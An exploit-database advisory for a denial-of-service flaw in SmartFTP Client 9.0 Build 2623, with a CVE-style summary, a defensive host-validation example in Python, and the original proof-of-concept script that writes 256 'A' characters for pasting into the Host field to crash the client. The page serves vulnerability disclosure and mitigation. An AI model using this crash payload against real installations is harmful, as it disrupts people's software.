Vendor: SmartFTP Client
By: Alejandra Sánchez
CVSS: 7.5 (HIGH)
Type: Denial of Service
CWE: 400
Product Name: SmartFTP Client
Affected Version From: 9.0.2623.0
Affected Version To: 9.0.2623.0
Patch Exists: YES
Related CWE: N/A
CPE: a:smartftp:smartftp_client
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows Server 2016 (x64)/ Windows 10 Single Language x64
2018

SmartFTP 9.0 Build 2623 – Denial of Service (PoC)

SmartFTP 9.0 Build 2623 is vulnerable to a denial of service. A payload of 256 "A" characters pasted into the Host field of the SmartFTP Client application causes the application to crash. The PoC is a Python script that writes the payload to a text file; the contents of that file are then copied and pasted into the Host field.

Mitigation:

Upgrade to the latest version of SmartFTP Client.
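
For developers of clients that accept a Host field, the following added example (not from the original page and not SmartFTP's code or its fix; the page does not state the root cause) shows input validation that rejects the PoC's 256-character value using the DNS limits of 253 characters per name and 63 per label. The function name validate_host and the sample inputs are hypothetical.

```python
import ipaddress
import re

MAX_HOSTNAME_LEN = 253  # DNS limit on a full name in text form
# One DNS label: 1-63 letters, digits or hyphens, no leading/trailing hyphen.
_LABEL_RE = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def validate_host(raw):
    """Return a normalized host string or raise ValueError.

    Hypothetical helper: bounds and checks the Host field before the
    value reaches any connection or parsing code.
    """
    if not isinstance(raw, str):
        raise ValueError("host must be text")
    host = raw.strip()
    if not host:
        raise ValueError("host is empty")
    # Length check first, so oversized clipboard data is dropped early.
    if len(host) > MAX_HOSTNAME_LEN:
        raise ValueError("host exceeds %d characters" % MAX_HOSTNAME_LEN)
    # Accept IPv4/IPv6 literals (IPv6 may be wrapped in brackets).
    bracketed = host.startswith("[") and host.endswith("]")
    candidate = host[1:-1] if bracketed else host
    try:
        return str(ipaddress.ip_address(candidate))
    except ValueError:
        pass
    # Otherwise require a syntactically valid DNS name.
    name = host[:-1] if host.endswith(".") else host  # allow root dot
    for label in name.split("."):
        if not _LABEL_RE.fullmatch(label):
            raise ValueError("invalid label: %r" % label[:20])
    return name.lower()


if __name__ == "__main__":
    # Constructed sample inputs, including the PoC-sized value.
    for sample in ["ftp.example.com", "[::1]", "A" * 256, "A" * 64]:
        try:
            print("accepted:", validate_host(sample))
        except ValueError as err:
            print("rejected:", err)
```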

Exploit-DB raw data:

# -*- coding: utf-8 -*-
# Exploit Title: SmartFTP 9.0 Build 2623 - Denial of Service (PoC)
# Date: 06/12/2018
# Exploit Author: Alejandra Sánchez
# Vendor Homepage: https://www.smartftp.com/en-us/
# Software Link: https://www.smartftp.com/get/SFTPMSI64.exe
# Version: 9.0.2623.0
# Tested on: Windows Server 2016 (x64)/ Windows 10 Single Language x64

# Steps to Produce the Crash: 
# 1.- Run python code : python SmartFTPClient.py
# 2.- Open SmartFTPClient.txt and copy content to clipboard
# 3.- Open SmartFTP Client 
# 4.- New connection
# 5.- Paste ClipBoard on Host 
# 6.- Crashed


# Payload: 256 "A" characters (0x41), written to a text file
buffer = "\x41" * 256
with open("SmartFTPClient.txt", "w") as f:
    f.write(buffer)